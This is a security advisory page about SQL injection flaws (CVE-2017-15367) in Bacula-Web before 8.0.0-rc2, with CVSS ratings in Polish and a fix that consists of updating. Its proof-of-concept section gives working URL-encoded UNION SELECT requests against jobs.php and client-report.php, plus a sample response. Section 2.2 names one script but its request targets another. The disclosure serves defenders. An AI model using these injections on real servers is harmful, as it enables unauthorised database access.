Bacula-Web < 8.0.0-rc2 SQL Injection

2018.03.10
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

# Exploit Title: Multiple SQL injection vulnerabilities in Bacula-Web # Date: 2018-03-07 # Software Link: http://bacula-web.org/ # Exploit Author: Gustavo Sorondo # Contact: http://twitter.com/iampuky # Website: http://cintainfinita.com/ # CVE: CVE-2017-15367 # Category: webapps 1. Description Bacula-web before 8.0.0-rc2 is affected by multiple SQL Injection vulnerabilities that could allow an attacker to access the Bacula database and, depending on configuration, escalate privileges on the server. 2. Proofs of Concept 2.1) The /jobs.php script is affected by a SQL Injection vulnerability. The following GET request can be used to extract the result of "select @@version" query. Request: GET /jobs.php?status=0&level_id=&client_id=0&start_time=&end_time=&orderby=jobid&jobs_per_page=25&pool_id=11%27%20UNION%20ALL%20SELECT%20@@version%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1 Response: HTTP/1.1 200 OK [...] <td>5.7.19-0ubuntu0.16.04.1</td> <td class="text-left"> backupjob-report.php?backupjob_name= [...] Other parameters (eg. client_id) are also vulnerable, since there is no protection against SQL Injections at all. 2.2) The /backupjob-report.php script is affected by a SQL Injection vulnerability. The following GET request can be used to extract the result of "select @@version" query. Request: GET /client-report.php?period=7&client_id=21%20UNION%20ALL%20SELECT%20NULL,@@version%23 2.3) The /client-report.php is affected by a SQL Injection vulnerability in the "client_id" parameter. 3. Solution: Update to version 8.0.0-RC2 http://bacula-web.org/news-reader/bacula-web-8-0-0-rc2-released.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top